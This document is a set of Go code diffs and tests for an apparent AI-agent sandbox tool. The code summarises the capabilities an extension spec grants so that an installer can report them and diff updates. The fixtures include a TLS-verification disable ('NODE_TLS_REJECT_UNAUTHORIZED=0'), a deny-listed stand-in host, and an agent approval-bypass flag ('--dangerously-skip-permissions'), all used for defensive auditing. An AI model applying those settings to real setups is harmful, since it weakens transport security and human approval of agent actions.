+	OAuthPorts          []string
+	SecurestorageDirEnv string
+}
+
+// SpecHostExposure collects the fields that expose host filesystem paths or
+// host credential files to the container: sandbox.* host-passthrough fields,
+// and the mixin-native top-level configDir/authFiles pair used by
+// enclave-native auth features (e.g. github-cli).
+type SpecHostExposure struct {
+	PassthroughPaths    []string
+	HostConfigDir       string
+	HostCredentialsFile string
+	HostOAuthJSON       string
+	MixinConfigDir      string
+	MixinAuthFiles      []string
+}
+
+// SpecSummary projects the capability-relevant fields of a spec document. It
+// exists so callers outside this package (the extension installer) can report
+// what an extension will be able to do without duplicating the on-disk schema,
+// which specDocument owns.
+type SpecSummary struct {
+	Kind                  string
+	Name                  string
+	DisplayName           string
+	Description           string
+	NeedsRoot             bool
+	AptPackages           []string
+	InstallCommands       int
+	InstallCommandsAsRoot int
+	StartupCommands       []string
+	InitFiles             []SpecInitFileSummary
+	AllowedDomains        []string
+	DeniedDomains         []string
+	Ports                 []int
+	CredentialEnv         []string
+	CredentialSources     []SpecCredentialSource
+	ProxyManaged          []string
+	EnvironmentVars       []string
+	EntrypointOverride    string
+	Providers             []SpecProviderSummary
+	HostExposure          SpecHostExposure
+	YoloFlag              string
+	YoloEnabled           bool
+	DefaultEnabled        *bool
+	DefaultIncluded       *bool
+}
+
+// SummarizeSpecDir reads dir's spec.yaml (falling back to spec.json) and
+// projects it onto a SpecSummary. It returns os.ErrNotExist when neither file
+// is present, and a parse error for a malformed, unknown-field, or
+// schemaVersion-mismatched document.
+func SummarizeSpecDir(dir string) (SpecSummary, error) {
+	specPath, ok := ownSpecFile(dir)
+	if !ok {
+		return SpecSummary{}, fmt.Errorf("no %s in %s: %w", SpecFilename, dir, os.ErrNotExist)
+	}
+
+	doc, err := parseSpecDocument(specPath)
+	if err != nil {
+		return SpecSummary{}, err
+	}
+	return summarizeSpecDocument(doc), nil
+}
+
+func summarizeSpecDocument(doc specDocument) SpecSummary {
+	summary := SpecSummary{
+		Kind:            strings.TrimSpace(doc.Kind),
+		Name:            strings.TrimSpace(doc.Name),
+		DisplayName:     strings.TrimSpace(doc.DisplayName),
+		Description:     strings.TrimSpace(doc.Description),
+		NeedsRoot:       doc.NeedsRoot,
+		AptPackages:     doc.AptPackages,
+		DefaultEnabled:  doc.DefaultEnabled,
+		DefaultIncluded: doc.DefaultIncluded,
+	}
+	if doc.Commands != nil {
+		summary.InstallCommands = len(doc.Commands.Install)
+		for _, cmd := range doc.Commands.Install {
+			if IsRootInstallUser(cmd.User) {
+				summary.InstallCommandsAsRoot++
+			}
+		}
+		for _, cmd := range doc.Commands.Startup {
+			summary.StartupCommands = append(summary.StartupCommands, describeSpecCommand(cmd))
+		}
+		for _, file := range doc.Commands.InitFiles {
+			summary.InitFiles = append(summary.InitFiles, SpecInitFileSummary{
+				Path:          strings.TrimSpace(file.Path),
+				OnlyIfMissing: file.OnlyIfMissing,
+			})
+		}
+	}
+	if doc.Network != nil {
+		summary.AllowedDomains = doc.Network.AllowedDomains
+		summary.DeniedDomains = doc.Network.DeniedDomains
+	}
+	if doc.Environment != nil {
+		summary.ProxyManaged = doc.Environment.ProxyManaged
+		for name := range doc.Environment.Variables {
+			summary.EnvironmentVars = append(summary.EnvironmentVars, name)
+		}
+		sort.Strings(summary.EnvironmentVars)
+	}
+	if doc.Credentials != nil {
+		hostsByService := serviceHostsByID(doc)
+		ids := make([]string, 0, len(doc.Credentials.Sources))
+		for id := range doc.Credentials.Sources {
+			ids = append(ids, id)
+		}
+		sort.Strings(ids)
+		var aliases []string
+		for _, id := range ids {
+			source := doc.Credentials.Sources[id]
+			cs := SpecCredentialSource{ID: id, Env: append([]string(nil), source.Env...)}
+			if source.File != nil {
+				cs.FilePath = source.File.Path
+				cs.FileParser = source.File.Parser
+			}
+			if doc.Network != nil {
+				if auth, ok := doc.Network.ServiceAuth[id]; ok {
+					cs.ReleaseHeader = auth.HeaderName
+					cs.ReleaseHosts = hostsByService[id]
+				}
+			}
+			summary.CredentialSources = append(summary.CredentialSources, cs)
+			aliases = append(aliases, source.Env...)
+		}
+		summary.CredentialEnv = sortDedupeStrings(aliases)
+	}
+	for _, port := range doc.Ports {
+		summary.Ports = append(summary.Ports, port.Container)
+	}
+	for _, p := range doc.Providers {
+		ps := SpecProviderSummary{
+			Name:                strings.TrimSpace(p.Name),
+			AuthFiles:           append([]string(nil), p.AuthFiles...),
+			SecurestorageDirEnv: p.SecurestorageDirEnv,
+		}
+		if p.AuthSession != nil {
+			ps.AuthSession = true
+			ps.AuthSessionMode = p.AuthSession.Mode
+		}
+		for _, op := range p.OAuthPorts {
+			ps.OAuthPorts = append(ps.OAuthPorts, op.Port)
+		}
+		summary.Providers = append(summary.Providers, ps)
+	}
+	if doc.Sandbox != nil {
+		if doc.Sandbox.Entrypoint != nil {
+			summary.EntrypointOverride = entrypointCommand(doc.Sandbox.Entrypoint)
+		}
+		summary.HostExposure.PassthroughPaths = doc.Sandbox.PassthroughPaths
+		summary.HostExposure.HostConfigDir = doc.Sandbox.HostConfigDir
+		summary.HostExposure.HostCredentialsFile = doc.Sandbox.HostCredentials
+		summary.HostExposure.HostOAuthJSON = doc.Sandbox.HostOAuthJSON
+		summary.YoloFlag = strings.TrimSpace(doc.Sandbox.YoloFlag)
+		summary.YoloEnabled = model.YoloEnabledValue(doc.Sandbox.YoloEnabled)
+	}
+	summary.HostExposure.MixinConfigDir = doc.ConfigDir
+	summary.HostExposure.MixinAuthFiles = doc.AuthFiles
+	return summary
+}
+
+// describeSpecCommand renders a startup command for display. specCommand.Command
+// is string or []string depending on the sbx stage, so both shapes are handled.
+func describeSpecCommand(cmd specCommand) string {
+	if description := strings.TrimSpace(cmd.Description); description != "" {
+		return description
+	}
+	switch value := cmd.Command.(type) {
+	case string:
+		return value
+	case []interface{}:
+		parts := make([]string, 0, len(value))
+		for _, item := range value {
+			parts = append(parts, fmt.Sprint(item))
+		}
+		return strings.Join(parts, " ")
+	default:
+		return "(command)"
+	}
+}

--- a/internal/config/spec_summary.go
+++ b/internal/config/spec_summary.go
@@ -8,18 +8,34 @@
 package config
 
 import (
+	"crypto/sha256"
+	"encoding/hex"
 	"fmt"
+	"maps"
 	"os"
-	"sort"
+	"slices"
 	"strings"
 
 	"enclave/internal/model"
 )
 
-// SpecInitFileSummary describes one commands.initFiles entry.
+// SpecInitFileSummary describes one commands.initFiles entry. kit-init.sh
+// writes the entry's content at the entry's mode on every container start, so
+// both belong here: ContentDigest stands in for the content itself, which is
+// arbitrarily long and is a file to inspect rather than a capability to read.
 type SpecInitFileSummary struct {
 	Path          string
+	Mode          string
 	OnlyIfMissing bool
+	ContentDigest string
+}
+
+// SpecPortSummary describes one ports[] entry. Publish is carried separately
+// from the port number because it, not the number, decides whether the port is
+// bound on the host.
+type SpecPortSummary struct {
+	Container int
+	Publish   bool
 }
 
 // SpecCredentialSource describes one credentials.sources entry: which env
@@ -64,6 +80,12 @@ type SpecHostExposure struct {
 // exists so callers outside this package (the extension installer) can report
 // what an extension will be able to do without duplicating the on-disk schema,
 // which specDocument owns.
+//
+// The command-bearing fields carry the command text rather than a count, so a
+// caller diffing two summaries notices a step that was rewritten in place.
+// InstallCommands additionally prefixes "(root) " to a step that runs as root,
+// which makes a step changing user visible even when the root count does not
+// move.
 type SpecSummary struct {
 	Kind                  string
 	Name                  string
@@ -71,18 +93,21 @@ type SpecSummary struct {
 	Description           string
 	NeedsRoot             bool
 	AptPackages           []string
-	InstallCommands       int
+	InstallCommands       []string
 	InstallCommandsAsRoot int
 	StartupCommands       []string
 	InitFiles             []SpecInitFileSummary
 	AllowedDomains        []string
 	DeniedDomains         []string
-	Ports                 []int
+	Ports                 []SpecPortSummary
 	CredentialEnv         []string
 	CredentialSources     []SpecCredentialSource
 	ProxyManaged          []string
 	EnvironmentVars       []string
 	EntrypointOverride    string
+	ContinueArgs          string
+	ResumeArgs            string
+	PostStartOpenIDE      string
 	Providers             []SpecProviderSummary
 	HostExposure          SpecHostExposure
 	YoloFlag              string
@@ -120,19 +145,23 @@ func summarizeSpecDocument(doc specDocument) SpecSummary {
 		DefaultIncluded: doc.DefaultIncluded,
 	}
 	if doc.Commands != nil {
-		summary.InstallCommands = len(doc.Commands.Install)
 		for _, cmd := range doc.Commands.Install {
+			text := specCommandText(cmd)
 			if IsRootInstallUser(cmd.User) {
 				summary.InstallCommandsAsRoot++
+				text = "(root) " + text
 			}
+			summary.InstallCommands = append(summary.InstallCommands, text)
 		}
 		for _, cmd := range doc.Commands.Startup {
-			summary.StartupCommands = append(summary.StartupCommands, describeSpecCommand(cmd))
+			summary.StartupCommands = append(summary.StartupCommands, specCommandText(cmd))
 		}
 		for _, file := range doc.Commands.InitFiles {
 			summary.InitFiles = append(summary.InitFiles, SpecInitFileSummary{
 				Path:          strings.TrimSpace(file.Path),
+				Mode:          strings.TrimSpace(file.Mode),
 				OnlyIfMissing: file.OnlyIfMissing,
+				ContentDigest: shortContentDigest(file.Content),
 			})
 		}
 	}
@@ -142,20 +171,17 @@ func summarizeSpecDocument(doc specDocument) SpecSummary {
 	}
 	if doc.Environment != nil {
 		summary.ProxyManaged = doc.Environment.ProxyManaged
-		for name := range doc.Environment.Variables {
-			summary.EnvironmentVars = append(summary.EnvironmentVars, name)
+		// Reported as NAME=value: the value is the capability. Setting
+		// NODE_TLS_REJECT_UNAUTHORIZED to 0 is not the same grant as setting it
+		// to 1, and a summary keyed on names alone cannot tell them apart.
+		for _, name := range slices.Sorted(maps.Keys(doc.Environment.Variables)) {
+			summary.EnvironmentVars = append(summary.EnvironmentVars, name+"="+doc.Environment.Variables[name])
 		}
-		sort.Strings(summary.EnvironmentVars)
 	}
 	if doc.Credentials != nil {
 		hostsByService := serviceHostsByID(doc)
-		ids := make([]string, 0, len(doc.Credentials.Sources))
-		for id := range doc.Credentials.Sources {
-			ids = append(ids, id)
-		}
-		sort.Strings(ids)
 		var aliases []string
-		for _, id := range ids {
+		for _, id := range slices.Sorted(maps.Keys(doc.Credentials.Sources)) {
 			source := doc.Credentials.Sources[id]
 			cs := SpecCredentialSource{ID: id, Env: append([]string(nil), source.Env...)}
 			if source.File != nil {
@@ -174,7 +200,7 @@ func summarizeSpecDocument(doc specDocument) SpecSummary {
 		summary.CredentialEnv = sortDedupeStrings(aliases)
 	}
 	for _, port := range doc.Ports {
-		summary.Ports = append(summary.Ports, port.Container)
+		summary.Ports = append(summary.Ports, SpecPortSummary{Container: port.Container, Publish: port.Publish})
 	}
 	for _, p := range doc.Providers {
 		ps := SpecProviderSummary{
@@ -191,10 +217,18 @@ func summarizeSpecDocument(doc specDocument) SpecSummary {
 		}
 		summary.Providers = append(summary.Providers, ps)
 	}
+	if doc.PostStart != nil {
+		summary.PostStartOpenIDE = strings.TrimSpace(doc.PostStart.OpenIDE)
+	}
 	if doc.Sandbox != nil {
 		if doc.Sandbox.Entrypoint != nil {
 			summary.EntrypointOverride = entrypointCommand(doc.Sandbox.Entrypoint)
 		}
+		// continueArgs/resumeArgs are appended to the agent's argv for
+		// `--continue`/`--resume`, so they grant whatever those flags grant —
+		// including approval bypass — without going through sandbox.yoloFlag.
+		summary.ContinueArgs = strings.Join(doc.Sandbox.ContinueArgs, " ")
+		summary.ResumeArgs = strings.Join(doc.Sandbox.ResumeArgs, " ")
 		summary.HostExposure.PassthroughPaths = doc.Sandbox.PassthroughPaths
 		summary.HostExposure.HostConfigDir = doc.Sandbox.HostConfigDir
 		summary.HostExposure.HostCredentialsFile = doc.Sandbox.HostCredentials
@@ -207,12 +241,23 @@ func summarizeSpecDocument(doc specDocument) SpecSummary {
 	return summary
 }
 
-// describeSpecCommand renders a startup command for display. specCommand.Command
-// is string or []string depending on the sbx stage, so both shapes are handled.
-func describeSpecCommand(cmd specCommand) string {
-	if description := strings.TrimSpace(cmd.Description); description != "" {
-		return description
+// shortContentDigest identifies a body of text by a truncated SHA-256, so a
+// summary can report that it changed without carrying it. An empty body has no
+// digest: there is nothing to identify.
+func shortContentDigest(content string) string {
+	if content == "" {
+		return ""
 	}
+	sum := sha256.Sum256([]byte(content))
+	return hex.EncodeToString(sum[:])[:12]
+}
+
+// specCommandText renders a command's argv as one string. specCommand.Command
+// is string or []string depending on the sbx stage, so both shapes are handled.
+// The author's description is deliberately not used in its place: an update
+// diff has to react to the shell that actually runs, and a description can stay
+// identical while the command underneath it is rewritten.
+func specCommandText(cmd specCommand) string {
 	switch value := cmd.Command.(type) {
 	case string:
 		return value

--- a/internal/config/spec_summary.go
+++ b/internal/config/spec_summary.go
@@ -119,14 +119,17 @@ type SpecSummary struct {
 // SummarizeSpecDir reads dir's spec.yaml (falling back to spec.json) and
 // projects it onto a SpecSummary. It returns os.ErrNotExist when neither file
 // is present, and a parse error for a malformed, unknown-field, or
-// schemaVersion-mismatched document.
+// schemaVersion-mismatched document. dir may be extension content that nothing
+// has sanitized yet — the installer classifies a fetched repository's
+// candidates before it copies anything — so the document is read under the
+// untrusted-source rules.
 func SummarizeSpecDir(dir string) (SpecSummary, error) {
 	specPath, ok := ownSpecFile(dir)
 	if !ok {
 		return SpecSummary{}, fmt.Errorf("no %s in %s: %w", SpecFilename, dir, os.ErrNotExist)
 	}
 
-	doc, err := parseSpecDocument(specPath)
+	doc, err := parseUntrustedSpecDocument(specPath)
 	if err != nil {
 		return SpecSummary{}, err
 	}

--- a/internal/config/spec_summary_test.go
+++ b/internal/config/spec_summary_test.go
@@ -1,0 +1,231 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package config
+
+import (
+	"errors"
+	"os"
+	"path/filepath"
+	"reflect"
+	"strings"
+	"testing"
+)
+
+const summaryFeatureSpec = `schemaVersion: "1"
+kind: mixin
+name: foo
+displayName: Foo
+description: A test feature
+needsRoot: true
+defaultEnabled: false
+aptPackages:
+  - gdb
+  - strace
+configDir: .config/foo
+authFiles:
+  - hosts.yml
+sandbox:
+  entrypoint:
+    run: [foo, --serve]
+  passthroughPaths:
+    - agents/
+  hostConfigDir: .foo
+  hostCredentialsFile: .credentials.json
+  hostOauthJson: .foo.json
+  yoloFlag: --dangerously-skip-permissions
+commands:
+  install:
+    - command: apt-get install -y foo
+      user: root
+  startup:
+    - command: foo --serve
+      description: start foo
+  initFiles:
+    - path: ${WORKDIR}/.foo.yaml
+      content: "{}"
+network:
+  allowedDomains:
+    - api.acme.com
+  deniedDomains:
+    - evil.example
+  serviceDomains:
+    cdn.acme.com: acme
+  serviceAuth:
+    acme:
+      headerName: X-Acme-Token
+      hosts: [api.acme.com]
+environment:
+  variables:
+    NODE_TLS_REJECT_UNAUTHORIZED: "0"
+  proxyManaged:
+    - ACME_TOKEN
+credentials:
+  sources:
+    acme:
+      env:
+        - ACME_TOKEN
+      file:
+        path: ~/.acme/token
+        parser: json
+providers:
+  - name: acme
+    authFiles: [config.json]
+    authSession:
+      mode: any
+      checks: [{ file: auth.json, type: file_exists }]
+    oauthPorts:
+      - { port: "1455" }
+    securestorageDirEnv: ACME_SECURESTORAGE_DIR
+ports:
+  - container: 8080
+    publish: true
+`
+
+func TestSummarizeSpecDir(t *testing.T) {
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilename), summaryFeatureSpec)
+
+	summary, err := SummarizeSpecDir(dir)
+	if err != nil {
+		t.Fatalf("SummarizeSpecDir: %v", err)
+	}
+	if summary.Kind != KindMixin || summary.Name != "foo" {
+		t.Fatalf("kind/name = %q/%q", summary.Kind, summary.Name)
+	}
+	if !summary.NeedsRoot {
+		t.Error("NeedsRoot = false, want true")
+	}
+	if summary.InstallCommands != 1 {
+		t.Errorf("InstallCommands = %d, want 1", summary.InstallCommands)
+	}
+	if len(summary.StartupCommands) != 1 {
+		t.Errorf("StartupCommands = %v, want one entry", summary.StartupCommands)
+	}
+	if len(summary.InitFiles) != 1 || summary.InitFiles[0].OnlyIfMissing {
+		t.Errorf("InitFiles = %+v", summary.InitFiles)
+	}
+	if len(summary.AllowedDomains) != 1 || summary.AllowedDomains[0] != "api.acme.com" {
+		t.Errorf("AllowedDomains = %v", summary.AllowedDomains)
+	}
+	if len(summary.Ports) != 1 || summary.Ports[0] != 8080 {
+		t.Errorf("Ports = %v", summary.Ports)
+	}
+	if len(summary.CredentialEnv) != 1 || summary.CredentialEnv[0] != "ACME_TOKEN" {
+		t.Errorf("CredentialEnv = %v", summary.CredentialEnv)
+	}
+	if summary.DefaultEnabled == nil || *summary.DefaultEnabled {
+		t.Errorf("DefaultEnabled = %v, want explicit false", summary.DefaultEnabled)
+	}
+	if len(summary.AptPackages) != 2 {
+		t.Errorf("AptPackages = %v", summary.AptPackages)
+	}
+	if summary.EntrypointOverride != "foo --serve" {
+		t.Errorf("EntrypointOverride = %q, want %q", summary.EntrypointOverride, "foo --serve")
+	}
+	if len(summary.EnvironmentVars) != 1 || summary.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED" {
+		t.Errorf("EnvironmentVars = %v", summary.EnvironmentVars)
+	}
+	if len(summary.CredentialSources) != 1 {
+		t.Fatalf("CredentialSources = %v, want one entry", summary.CredentialSources)
+	}
+	cs := summary.CredentialSources[0]
+	if cs.ID != "acme" || cs.FilePath != "~/.acme/token" || cs.FileParser != "json" {
+		t.Errorf("CredentialSources[0] file fields = %+v", cs)
+	}
+	if cs.ReleaseHeader != "X-Acme-Token" || len(cs.ReleaseHosts) != 2 {
+		t.Errorf("CredentialSources[0] release fields = %+v, want header X-Acme-Token and 2 hosts (cdn.acme.com + api.acme.com)", cs)
+	}
+	if len(summary.Providers) != 1 {
+		t.Fatalf("Providers = %v, want one entry", summary.Providers)
+	}
+	provider := summary.Providers[0]
+	if provider.Name != "acme" || len(provider.AuthFiles) != 1 || !provider.AuthSession || provider.AuthSessionMode != "any" {
+		t.Errorf("Providers[0] = %+v", provider)
+	}
+	if len(provider.OAuthPorts) != 1 || provider.OAuthPorts[0] != "1455" {
+		t.Errorf("Providers[0].OAuthPorts = %v", provider.OAuthPorts)
+	}
+	if provider.SecurestorageDirEnv != "ACME_SECURESTORAGE_DIR" {
+		t.Errorf("Providers[0].SecurestorageDirEnv = %q", provider.SecurestorageDirEnv)
+	}
+	wantExposure := SpecHostExposure{
+		PassthroughPaths:    []string{"agents/"},
+		HostConfigDir:       ".foo",
+		HostCredentialsFile: ".credentials.json",
+		HostOAuthJSON:       ".foo.json",
+		MixinConfigDir:      ".config/foo",
+		MixinAuthFiles:      []string{"hosts.yml"},
+	}
+	if !reflect.DeepEqual(summary.HostExposure, wantExposure) {
+		t.Errorf("HostExposure = %+v, want %+v", summary.HostExposure, wantExposure)
+	}
+	if summary.YoloFlag != "--dangerously-skip-permissions" {
+		t.Errorf("YoloFlag = %q, want %q", summary.YoloFlag, "--dangerously-skip-permissions")
+	}
+	if !summary.YoloEnabled {
+		t.Error("YoloEnabled = false, want true (an unset yoloEnabled defaults to true)")
+	}
+}
+
+// TestSummarizeSpecDirYoloDisabled confirms an explicit yoloEnabled: false
+// overrides the default-true behavior TestSummarizeSpecDir exercises above.
+func TestSummarizeSpecDirYoloDisabled(t *testing.T) {
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilename), "schemaVersion: \"1\"\nkind: sandbox\nname: foo\n"+
+		"sandbox:\n  yoloFlag: --dangerously-skip-permissions\n  yoloEnabled: false\n")
+
+	summary, err := SummarizeSpecDir(dir)
+	if err != nil {
+		t.Fatalf("SummarizeSpecDir: %v", err)
+	}
+	if summary.YoloFlag != "--dangerously-skip-permissions" {
+		t.Errorf("YoloFlag = %q, want %q", summary.YoloFlag, "--dangerously-skip-permissions")
+	}
+	if summary.YoloEnabled {
+		t.Error("YoloEnabled = true, want false (explicit yoloEnabled: false)")
+	}
+}
+
+func TestSummarizeSpecDirAcceptsJSON(t *testing.T) {
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilenameJSON), `{"schemaVersion":"1","kind":"sandbox","name":"bar"}`)
+
+	summary, err := SummarizeSpecDir(dir)
+	if err != nil {
+		t.Fatalf("SummarizeSpecDir: %v", err)
+	}
+	if summary.Kind != KindSandbox || summary.Name != "bar" {
+		t.Fatalf("kind/name = %q/%q", summary.Kind, summary.Name)
+	}
+}
+
+func TestSummarizeSpecDirMissing(t *testing.T) {
+	if _, err := SummarizeSpecDir(t.TempDir()); !errors.Is(err, os.ErrNotExist) {
+		t.Fatalf("err = %v, want os.ErrNotExist", err)
+	}
+}
+
+func TestSummarizeSpecDirRejectsUnknownField(t *testing.T) {
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilename), "schemaVersion: \"1\"\nkind: mixin\nname: foo\nbogusField: 1\n")
+	if _, err := SummarizeSpecDir(dir); err == nil {
+		t.Fatal("SummarizeSpecDir accepted an unknown field, want error")
+	}
+}
+
+func TestSummarizeSpecDirRejectsSchemaVersionMismatch(t *testing.T) {
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilename), "schemaVersion: \"2\"\nkind: mixin\nname: foo\n")
+	_, err := SummarizeSpecDir(dir)
+	if err == nil {
+		t.Fatal("SummarizeSpecDir accepted a schemaVersion mismatch, want error")
+	}
+	if !strings.Contains(err.Error(), "schemaVersion") {
+		t.Fatalf("err = %v, want it to mention schemaVersion", err)
+	}
+}

--- a/internal/config/spec_summary_test.go
+++ b/internal/config/spec_summary_test.go
@@ -38,6 +38,10 @@ sandbox:
   hostCredentialsFile: .credentials.json
   hostOauthJson: .foo.json
   yoloFlag: --dangerously-skip-permissions
+  continueArgs: [resume, --last]
+  resumeArgs: [resume]
+postStart:
+  openIDE: theia
 commands:
   install:
     - command: apt-get install -y foo
@@ -48,6 +52,7 @@ commands:
   initFiles:
     - path: ${WORKDIR}/.foo.yaml
       content: "{}"
+      mode: "0600"
 network:
   allowedDomains:
     - api.acme.com
@@ -100,20 +105,27 @@ func TestSummarizeSpecDir(t *testing.T) {
 	if !summary.NeedsRoot {
 		t.Error("NeedsRoot = false, want true")
 	}
-	if summary.InstallCommands != 1 {
-		t.Errorf("InstallCommands = %d, want 1", summary.InstallCommands)
+	if len(summary.InstallCommands) != 1 || summary.InstallCommands[0] != "(root) apt-get install -y foo" {
+		t.Errorf("InstallCommands = %v, want the root-marked command text", summary.InstallCommands)
 	}
-	if len(summary.StartupCommands) != 1 {
-		t.Errorf("StartupCommands = %v, want one entry", summary.StartupCommands)
+	// The spec's startup entry carries a description; the summary projects the
+	// command itself so a rewrite under an unchanged description still diffs.
+	if len(summary.StartupCommands) != 1 || summary.StartupCommands[0] != "foo --serve" {
+		t.Errorf("StartupCommands = %v, want the command text", summary.StartupCommands)
 	}
 	if len(summary.InitFiles) != 1 || summary.InitFiles[0].OnlyIfMissing {
 		t.Errorf("InitFiles = %+v", summary.InitFiles)
 	}
+	// Mode and a stand-in for the content both decide what lands on disk at
+	// every start, so both have to reach the summary.
+	if summary.InitFiles[0].Mode != "0600" || summary.InitFiles[0].ContentDigest == "" {
+		t.Errorf("InitFiles[0] = %+v, want the mode and a content digest", summary.InitFiles[0])
+	}
 	if len(summary.AllowedDomains) != 1 || summary.AllowedDomains[0] != "api.acme.com" {
 		t.Errorf("AllowedDomains = %v", summary.AllowedDomains)
 	}
-	if len(summary.Ports) != 1 || summary.Ports[0] != 8080 {
-		t.Errorf("Ports = %v", summary.Ports)
+	if len(summary.Ports) != 1 || summary.Ports[0] != (SpecPortSummary{Container: 8080, Publish: true}) {
+		t.Errorf("Ports = %v, want the container port with publish carried alongside it", summary.Ports)
 	}
 	if len(summary.CredentialEnv) != 1 || summary.CredentialEnv[0] != "ACME_TOKEN" {
 		t.Errorf("CredentialEnv = %v", summary.CredentialEnv)
@@ -127,8 +139,17 @@ func TestSummarizeSpecDir(t *testing.T) {
 	if summary.EntrypointOverride != "foo --serve" {
 		t.Errorf("EntrypointOverride = %q, want %q", summary.EntrypointOverride, "foo --serve")
 	}
-	if len(summary.EnvironmentVars) != 1 || summary.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED" {
-		t.Errorf("EnvironmentVars = %v", summary.EnvironmentVars)
+	if summary.ContinueArgs != "resume --last" || summary.ResumeArgs != "resume" {
+		t.Errorf("session args = %q/%q, want the argv appended to the agent for --continue/--resume",
+			summary.ContinueArgs, summary.ResumeArgs)
+	}
+	if summary.PostStartOpenIDE != "theia" {
+		t.Errorf("PostStartOpenIDE = %q, want theia", summary.PostStartOpenIDE)
+	}
+	// The value is reported alongside the name: NODE_TLS_REJECT_UNAUTHORIZED=0
+	// and =1 are different grants.
+	if len(summary.EnvironmentVars) != 1 || summary.EnvironmentVars[0] != "NODE_TLS_REJECT_UNAUTHORIZED=0" {
+		t.Errorf("EnvironmentVars = %v, want the value carried alongside the name", summary.EnvironmentVars)
 	}
 	if len(summary.CredentialSources) != 1 {
 		t.Fatalf("CredentialSources = %v, want one entry", summary.CredentialSources)

--- a/internal/config/spec_summary_test.go
+++ b/internal/config/spec_summary_test.go
@@ -239,6 +239,45 @@ func TestSummarizeSpecDirRejectsUnknownField(t *testing.T) {
 	}
 }
 
+// TestSummarizeSpecDirRejectsSymlinkedSpec covers the untrusted-source rules:
+// this is the first read of a fetched repository's content, before the
+// installer's sanitizer has seen any of it, so a spec committed as a symlink
+// must be refused rather than followed to a host file, a device, or a FIFO.
+func TestSummarizeSpecDirRejectsSymlinkedSpec(t *testing.T) {
+	dir := t.TempDir()
+	outside := filepath.Join(t.TempDir(), "elsewhere.yaml")
+	writeTestFile(t, outside, "schemaVersion: \"1\"\nkind: mixin\nname: foo\n")
+	if err := os.Symlink(outside, filepath.Join(dir, SpecFilename)); err != nil {
+		t.Skipf("symlink unsupported: %v", err)
+	}
+
+	if _, err := SummarizeSpecDir(dir); err == nil {
+		t.Fatal("SummarizeSpecDir followed a symlinked spec, want error")
+	}
+}
+
+func TestSummarizeSpecDirSizeCap(t *testing.T) {
+	spec := func(padding int) string {
+		body := "schemaVersion: \"1\"\nkind: mixin\nname: foo\ndescription: "
+		return body + strings.Repeat("x", padding-len(body))
+	}
+
+	dir := t.TempDir()
+	writeTestFile(t, filepath.Join(dir, SpecFilename), spec(maxSpecBytes))
+	if _, err := SummarizeSpecDir(dir); err != nil {
+		t.Fatalf("SummarizeSpecDir at the size cap: %v", err)
+	}
+
+	writeTestFile(t, filepath.Join(dir, SpecFilename), spec(maxSpecBytes+1))
+	_, err := SummarizeSpecDir(dir)
+	if err == nil {
+		t.Fatal("SummarizeSpecDir accepted a spec past the size cap, want error")
+	}
+	if !strings.Contains(err.Error(), "larger than") {
+		t.Fatalf("err = %v, want it to name the size cap", err)
+	}
+}
+
 func TestSummarizeSpecDirRejectsSchemaVersionMismatch(t *testing.T) {
 	dir := t.TempDir()
 	writeTestFile(t, filepath.Join(dir, SpecFilename), "schemaVersion: \"2\"\nkind: mixin\nname: foo\n")

--- a/internal/config/testdata/golden/feature-debug-tools.json
+++ b/internal/config/testdata/golden/feature-debug-tools.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "debug-tools",
+  "display_name": "Debug Tools",
   "description": "Debugging tools (gdb, strace, ltrace, etc.)",
   "apt_packages": [
     "gdb",

--- a/internal/config/testdata/golden/feature-devtools.json
+++ b/internal/config/testdata/golden/feature-devtools.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "devtools",
+  "display_name": "Development Tools",
   "description": "Core development tools (vim, htop, ripgrep, etc.)",
   "apt_packages": [
     "vim",

--- a/internal/config/testdata/golden/feature-github-cli.json
+++ b/internal/config/testdata/golden/feature-github-cli.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "github-cli",
+  "display_name": "GitHub CLI",
   "description": "GitHub CLI (gh)",
   "needs_root": true,
   "default_enabled": true,

--- a/internal/config/testdata/golden/feature-gitlab-cli.json
+++ b/internal/config/testdata/golden/feature-gitlab-cli.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "gitlab-cli",
+  "display_name": "GitLab CLI",
   "description": "GitLab CLI (glab)",
   "needs_root": true,
   "priority": 50,

--- a/internal/config/testdata/golden/feature-node-dev.json
+++ b/internal/config/testdata/golden/feature-node-dev.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "node-dev",
+  "display_name": "Node.js Development Tools",
   "description": "Node.js development tools (typescript, eslint, prettier, etc.)",
   "default_enabled": true,
   "priority": 70

--- a/internal/config/testdata/golden/feature-playwright.json
+++ b/internal/config/testdata/golden/feature-playwright.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "playwright",
+  "display_name": "Playwright",
   "description": "Playwright browsers and MCP server for UI testing",
   "needs_root": true,
   "priority": 75

--- a/internal/config/testdata/golden/feature-python-dev.json
+++ b/internal/config/testdata/golden/feature-python-dev.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "python-dev",
+  "display_name": "Python Development Tools",
   "description": "Python development tools (black, ruff, mypy, pytest, etc.)",
   "default_enabled": true,
   "priority": 70

--- a/internal/config/testdata/golden/feature-shell-extras.json
+++ b/internal/config/testdata/golden/feature-shell-extras.json
@@ -1,6 +1,7 @@
 {
   "type": "mixin",
   "name": "shell-extras",
+  "display_name": "Shell Extras",
   "description": "Enhanced shell experience (zsh, oh-my-zsh)",
   "apt_packages": [
     "zsh",

--- a/internal/config/testdata/golden/tool-ext-claude.json
+++ b/internal/config/testdata/golden/tool-ext-claude.json
@@ -1,6 +1,7 @@
 {
   "type": "sandbox",
   "name": "claude",
+  "display_name": "Claude Code",
   "description": "Claude Code AI assistant",
   "default_included": true,
   "priority": 100,

